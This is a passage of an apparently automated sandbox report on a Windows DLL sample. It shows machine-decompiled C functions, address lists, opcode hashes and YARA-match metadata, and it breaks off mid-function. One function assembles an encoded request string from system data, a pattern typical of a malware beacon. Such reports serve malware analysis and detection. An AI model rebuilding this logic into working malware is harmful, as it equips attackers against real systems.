									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0xd4d2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xd4d2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0xd4d328 = 1;
							__eflags =  *0xd4d328;
							if( *0xd4d328 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0xd4d2e8 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0xd4d2e8 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0xd4d328 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0xd4d2e8 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0xd4d2e0 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0xd4d2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xd4d2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                0x00d4b1ef
                                0x00d4b1f2
                                0x00d4b1f8
                                0x00d4b216
                                0x00000000
                                0x00d4b216
                                0x00d4b200
                                0x00d4b209
                                0x00d4b20f
                                0x00d4b21e
                                0x00d4b221
                                0x00d4b224
                                0x00d4b22e
                                0x00d4b22e
                                0x00d4b230
                                0x00d4b233
                                0x00d4b235
                                0x00d4b235
                                0x00d4b237
                                0x00d4b23a
                                0x00000000
                                0x00000000
                                0x00d4b23c
                                0x00d4b23e
                                0x00d4b2a4
                                0x00d4b2a4
                                0x00d4b402
                                0x00000000
                                0x00d4b402
                                0x00d4b240
                                0x00d4b240
                                0x00d4b244
                                0x00d4b246
                                0x00d4b246
                                0x00d4b246
                                0x00d4b246
                                0x00d4b249
                                0x00d4b24a
                                0x00d4b24d
                                0x00d4b24d
                                0x00d4b251
                                0x00d4b255
                                0x00d4b263
                                0x00d4b263
                                0x00d4b26b
                                0x00d4b271
                                0x00d4b273
                                0x00d4b275
                                0x00d4b285
                                0x00d4b292
                                0x00d4b296
                                0x00d4b29b
                                0x00d4b29d
                                0x00d4b31b
                                0x00d4b31b
                                0x00d4b29f
                                0x00d4b29f
                                0x00d4b29f
                                0x00d4b31d
                                0x00d4b31f
                                0x00d4b400
                                0x00d4b400
                                0x00000000
                                0x00d4b325
                                0x00d4b325
                                0x00d4b32c
                                0x00000000
                                0x00000000
                                0x00d4b332
                                0x00d4b336
                                0x00d4b392
                                0x00d4b394
                                0x00d4b39c
                                0x00d4b39e
                                0x00d4b3a0
                                0x00000000
                                0x00000000
                                0x00d4b3a2
                                0x00d4b3a8
                                0x00d4b3aa
                                0x00d4b3ac
                                0x00d4b3c1
                                0x00d4b3c1
                                0x00d4b3c3
                                0x00d4b3f2
                                0x00d4b3f9
                                0x00000000
                                0x00d4b3f9
                                0x00d4b3c7
                                0x00d4b3c8
                                0x00d4b3ca
                                0x00d4b3cc
                                0x00d4b3cc
                                0x00d4b3ce
                                0x00d4b3d0
                                0x00d4b3d2
                                0x00d4b3e6
                                0x00d4b3e6
                                0x00d4b3e9
                                0x00d4b3eb
                                0x00d4b3eb
                                0x00d4b3ec
                                0x00d4b3ec
                                0x00000000
                                0x00d4b3d4
                                0x00d4b3d4
                                0x00d4b3d4
                                0x00d4b3dd
                                0x00d4b3de
                                0x00d4b3e0
                                0x00d4b3e2
                                0x00d4b3e2
                                0x00000000
                                0x00d4b3d4
                                0x00d4b3d2
                                0x00d4b3ae
                                0x00d4b3b5
                                0x00d4b3b5
                                0x00d4b3b7
                                0x00000000
                                0x00000000
                                0x00d4b3b9
                                0x00d4b3ba
                                0x00d4b3bd
                                0x00d4b3bf
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d4b3bf
                                0x00000000
                                0x00d4b3b5
                                0x00d4b338
                                0x00d4b33b
                                0x00d4b340
                                0x00000000
                                0x00000000
                                0x00d4b349
                                0x00d4b34b
                                0x00d4b351
                                0x00000000
                                0x00000000
                                0x00d4b357
                                0x00d4b35d
                                0x00000000
                                0x00000000
                                0x00d4b363
                                0x00d4b365
                                0x00d4b36e
                                0x00d4b372
                                0x00000000
                                0x00000000
                                0x00d4b378
                                0x00d4b37b
                                0x00d4b37d
                                0x00000000
                                0x00000000
                                0x00d4b384
                                0x00d4b386
                                0x00000000
                                0x00000000
                                0x00d4b388
                                0x00d4b38c
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d4b38c
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d4b277
                                0x00d4b277
                                0x00d4b277
                                0x00d4b27e
                                0x00000000
                                0x00000000
                                0x00d4b280
                                0x00d4b281
                                0x00d4b283
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d4b283
                                0x00d4b2ab
                                0x00d4b2ad
                                0x00000000
                                0x00000000
                                0x00d4b2bd
                                0x00d4b2bf
                                0x00d4b2c1
                                0x00000000
                                0x00000000
                                0x00d4b2c7
                                0x00d4b2ce
                                0x00d4b2fa
                                0x00d4b2fa
                                0x00d4b2fc
                                0x00d4b2fe
                                0x00d4b312
                                0x00d4b314
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d4b300
                                0x00d4b300
                                0x00d4b300
                                0x00d4b309
                                0x00d4b30a
                                0x00d4b30c
                                0x00d4b30e
                                0x00d4b30e
                                0x00000000
                                0x00d4b300
                                0x00d4b2d0
                                0x00d4b2d0
                                0x00d4b2d3
                                0x00d4b2d5
                                0x00d4b2e7
                                0x00d4b2e7
                                0x00d4b2ea
                                0x00d4b2ec
                                0x00d4b2ec
                                0x00d4b2ed
                                0x00d4b2ed
                                0x00d4b2f3
                                0x00d4b2f3
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d4b2d7
                                0x00d4b2d7
                                0x00d4b2d7
                                0x00d4b2de
                                0x00000000
                                0x00000000
                                0x00d4b2e0
                                0x00d4b2e0
                                0x00d4b2e1
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d4b2e1
                                0x00d4b2e3
                                0x00d4b2e5
                                0x00d4b2f8
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d4b2f8
                                0x00000000
                                0x00d4b2e5
                                0x00d4b257
                                0x00d4b25a
                                0x00d4b25d
                                0x00000000
                                0x00000000
                                0x00d4b25f
                                0x00d4b261
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d4b261
                                0x00d4b226
                                0x00d4b228
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00D4B296
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: MemoryQueryVirtual
                                • String ID:
                                • API String ID: 2850889275-0
                                • Opcode ID: f5c7f7ea37dbd6343912b162492a4391fed88a0fd3ce0ec3beda3ce553655a18
                                • Instruction ID: 7bb24437bbdf59b2d27992eb1d9db3d14822aac4cabe17d6e83b0de4cc706321
                                • Opcode Fuzzy Hash: f5c7f7ea37dbd6343912b162492a4391fed88a0fd3ce0ec3beda3ce553655a18
                                • Instruction Fuzzy Hash: 3B61B5316006069FDB19CF2DD8D463D73A6EBA6338F28852BD495C7691E7B0DC42C678
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 009107C9, Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.795811026.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_910000_loaddll32.jbxd
                                Similarity
                                • API ID:
                                • String ID: t32c
                                • API String ID: 0-3674199949
                                • Opcode ID: 99c35cf172511bbd92e7d6a7d234468ffbc3ce4bde2787b016b380336507cf81
                                • Instruction ID: 1c33eca53bbb74f53274983b40ac922cbbc159ac8beddc907b9d8bb48a73cb32
                                • Opcode Fuzzy Hash: 99c35cf172511bbd92e7d6a7d234468ffbc3ce4bde2787b016b380336507cf81
                                • Instruction Fuzzy Hash: E2514836A0021ADFEF14CF84DD84BA9B7B9FF84324F199195D8086B216D371AEC5DB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 009108B2, Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.795811026.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_910000_loaddll32.jbxd
                                Similarity
                                • API ID:
                                • String ID: t32c
                                • API String ID: 0-3674199949
                                • Opcode ID: a1d9a42090d8c36ff833a99ab1176823e0b3ab7c5e652fae9d09e90f8e3ad70c
                                • Instruction ID: 37dd45bf250515504a2418d99d029e8ae92103eab7968462c4db6c89afb1d2f3
                                • Opcode Fuzzy Hash: a1d9a42090d8c36ff833a99ab1176823e0b3ab7c5e652fae9d09e90f8e3ad70c
                                • Instruction Fuzzy Hash: 5E514A72A0021ADFDF20CF44CD84BA9B7B9FF88314F198595D9496B212D3B1AEC5DB80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0091099E, Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.795811026.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_910000_loaddll32.jbxd
                                Similarity
                                • API ID:
                                • String ID: t32c
                                • API String ID: 0-3674199949
                                • Opcode ID: 815c5047575feb08699417f69d0f17cbf477ce9da8faa060a24343471615705c
                                • Instruction ID: ca969056869c3e4d3fa4c631c1128ad3630df8f98b396ad19517be729f9a5b1c
                                • Opcode Fuzzy Hash: 815c5047575feb08699417f69d0f17cbf477ce9da8faa060a24343471615705c
                                • Instruction Fuzzy Hash: 8C415A76A00219DFEB20CF94CD84BA9B7B9FF88724F188595D9096B256C371AEC1CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0091090D, Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.795811026.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_910000_loaddll32.jbxd
                                Similarity
                                • API ID:
                                • String ID: t32c
                                • API String ID: 0-3674199949
                                • Opcode ID: 5729f38530edfeb47ae83503f7da0dbcd19f44cb695773290700f1287b00e58e
                                • Instruction ID: 31fbc96855655362da71ca79f9f75cbeb445a040c688cfe7c6b245b58a6bd5a5
                                • Opcode Fuzzy Hash: 5729f38530edfeb47ae83503f7da0dbcd19f44cb695773290700f1287b00e58e
                                • Instruction Fuzzy Hash: 21415E75A0021ADFDF20CF44DD84BA8B7B5FF88324F159595D9086B216D3B5AEC5CB80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00910B68, Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.795811026.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_910000_loaddll32.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d0ab5939c17571c0ae3b6999921ebd3ea3ecc7652e36932efdc0a7ad6381d8d7
                                • Instruction ID: 4442b3ed00ffc62e2175c1f9a55588769553e05ad43fe3c80ca00b05b11b60fb
                                • Opcode Fuzzy Hash: d0ab5939c17571c0ae3b6999921ebd3ea3ecc7652e36932efdc0a7ad6381d8d7
                                • Instruction Fuzzy Hash: CE2163438073417BEF80147CA49A3C7A3E2D753B91FE57829C4848399BA41E3B6F7242
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00910B6A, Relevance: .1, Instructions: 91COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.795811026.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_910000_loaddll32.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 117ded5a4771bf824923cd602bcece8b90c303a5c8ee0e0eed6df61f92816359
                                • Instruction ID: f8cf89903568956ec34065974c46de42842ce30694422d3e601bc842e44d302e
                                • Opcode Fuzzy Hash: 117ded5a4771bf824923cd602bcece8b90c303a5c8ee0e0eed6df61f92816359
                                • Instruction Fuzzy Hash: 782143538073457BEF80147CA45A3C7A3E2D757B91FE57819C4848399BA41E3B6F7242
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 100021B4, Relevance: .1, Instructions: 77COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 71%
                                			E100021B4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E1000231B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E100023D5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E100022C0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E1000231B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E100023B7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                0x100021b8
                                0x100021b9
                                0x100021ba
                                0x100021bd
                                0x100021bf
                                0x100021c2
                                0x100021c3
                                0x100021c5
                                0x100021c6
                                0x100021c7
                                0x100021ca
                                0x100021d4
                                0x10002285
                                0x1000228c
                                0x10002295
                                0x100021da
                                0x100021da
                                0x100021e0
                                0x100021e6
                                0x100021e9
                                0x100021ec
                                0x100021f0
                                0x100021f5
                                0x100021fa
                                0x1000227a
                                0x00000000
                                0x100021fc
                                0x100021fc
                                0x10002208
                                0x1000220a
                                0x10002265
                                0x10002265
                                0x1000226b
                                0x00000000
                                0x1000220c
                                0x1000221b
                                0x1000221d
                                0x1000221e
                                0x1000221f
                                0x10002222
                                0x10002222
                                0x10002224
                                0x00000000
                                0x10002226
                                0x10002226
                                0x10002270
                                0x10002228
                                0x10002228
                                0x1000222c
                                0x10002234
                                0x10002239
                                0x1000223e
                                0x1000224a
                                0x10002252
                                0x10002259
                                0x1000225f
                                0x10002263
                                0x00000000
                                0x10002263
                                0x10002226
                                0x10002224
                                0x00000000
                                0x1000220a
                                0x1000227e
                                0x1000227e
                                0x1000227e
                                0x100021fa
                                0x1000229a
                                0x100022a1

                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                • Instruction ID: 998f964cf8a00a12d388af1eaf269aed7343e4ee342723e71f6604d3686ecfb7
                                • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                • Instruction Fuzzy Hash: 7821CB37904204AFDB10DFA8C8C09ABF7A5FF49390B468168DD159B249D730FA15C7E0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D4AFC0, Relevance: .1, Instructions: 77COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 71%
                                			E00D4AFC0(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00D4B12B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00D4B1E5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00D4B0D0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00D4B12B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00D4B1C7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                0x00d4afc4
                                0x00d4afc5
                                0x00d4afc6
                                0x00d4afc9
                                0x00d4afcb
                                0x00d4afce
                                0x00d4afcf
                                0x00d4afd1
                                0x00d4afd2
                                0x00d4afd3
                                0x00d4afd6
                                0x00d4afe0
                                0x00d4b091
                                0x00d4b098
                                0x00d4b0a1
                                0x00d4afe6
                                0x00d4afe6
                                0x00d4afec
                                0x00d4aff2
                                0x00d4aff5
                                0x00d4aff8
                                0x00d4affc
                                0x00d4b001
                                0x00d4b006
                                0x00d4b086
                                0x00000000
                                0x00d4b008
                                0x00d4b008
                                0x00d4b014
                                0x00d4b016
                                0x00d4b071
                                0x00d4b071
                                0x00d4b077
                                0x00000000
                                0x00d4b018
                                0x00d4b027
                                0x00d4b029
                                0x00d4b02a
                                0x00d4b02b
                                0x00d4b02e
                                0x00d4b02e
                                0x00d4b030
                                0x00000000
                                0x00d4b032
                                0x00d4b032
                                0x00d4b07c
                                0x00d4b034
                                0x00d4b034
                                0x00d4b038
                                0x00d4b040
                                0x00d4b045
                                0x00d4b04a
                                0x00d4b056
                                0x00d4b05e
                                0x00d4b065
                                0x00d4b06b
                                0x00d4b06f
                                0x00000000
                                0x00d4b06f
                                0x00d4b032
                                0x00d4b030
                                0x00000000
                                0x00d4b016
                                0x00d4b08a
                                0x00d4b08a
                                0x00d4b08a
                                0x00d4b006
                                0x00d4b0a6
                                0x00d4b0ad

                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                • Instruction ID: 3cfa58f7dbcb485be2871ecc4adea594f5400083ec9326ff2a21efc383111c35
                                • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                • Instruction Fuzzy Hash: E821B6329002049BCB14EF68C8C09A7BBA5FF55360B098569ED659B246D730FA15CBF0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00910779, Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.795811026.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_910000_loaddll32.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 37f5b1033e76e2b6b36c1d4338148d8c6e4043e22c5ea1391d20c78c90c4df38
                                • Instruction ID: 046bd1c2d6fc4dfd2834609802aae3f3461f5778012b7cefe1e216c78a2818ea
                                • Opcode Fuzzy Hash: 37f5b1033e76e2b6b36c1d4338148d8c6e4043e22c5ea1391d20c78c90c4df38
                                • Instruction Fuzzy Hash: A7E01234E011198BCF20D5108D4A6AAB3F5ABCC315F1440D4C41D733508671BDC5CE41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00910541, Relevance: .0, Instructions: 20COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.795811026.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_910000_loaddll32.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0ad46a0b49349d618c0a572f2f45aab2f8f951c7b69cb57b2fbf92d7413da058
                                • Instruction ID: bd87a8dc77193d2315adc65fab6fbaacc91a82f595b59cb90503cbbe65ecd256
                                • Opcode Fuzzy Hash: 0ad46a0b49349d618c0a572f2f45aab2f8f951c7b69cb57b2fbf92d7413da058
                                • Instruction Fuzzy Hash: 66E0B6B6901118FEFF168A44CD44FFAB7BDEBC8700F1480E6F609AA050C6315E808F20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D45450, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 244memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 74%
                                			E00D45450(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0xd4d018; // 0xefcf766a
				asm("bswap eax");
				_t61 =  *0xd4d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0xd4d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 = E00D4D00C; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0xd4d2a8; // 0x253a5a8
				_t3 = _t64 + 0xd4e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3d163, _t63, _t62, _t61, _t60,  *0xd4d02c,  *0xd4d004, _t59);
				_t67 = E00D43288();
				_t68 =  *0xd4d2a8; // 0x253a5a8
				_t4 = _t68 + 0xd4e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E00D4831C(_t134);
				_t133 = __imp__; // 0x74e05520
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0xd4d2a8; // 0x253a5a8
					_t7 = _t126 + 0xd4e8d4; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0xd4d238, 0, _v8);
				}
				_t73 = E00D49267();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0xd4d2a8; // 0x253a5a8
					_t11 = _t121 + 0xd4e8dc; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0xd4d238, 0, _v8);
				}
				_t146 =  *0xd4d32c; // 0x32895b0
				_t75 = E00D4284E(0xd4d00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0xd4d238, _t152, _a16);
					return _v12;
				} else {
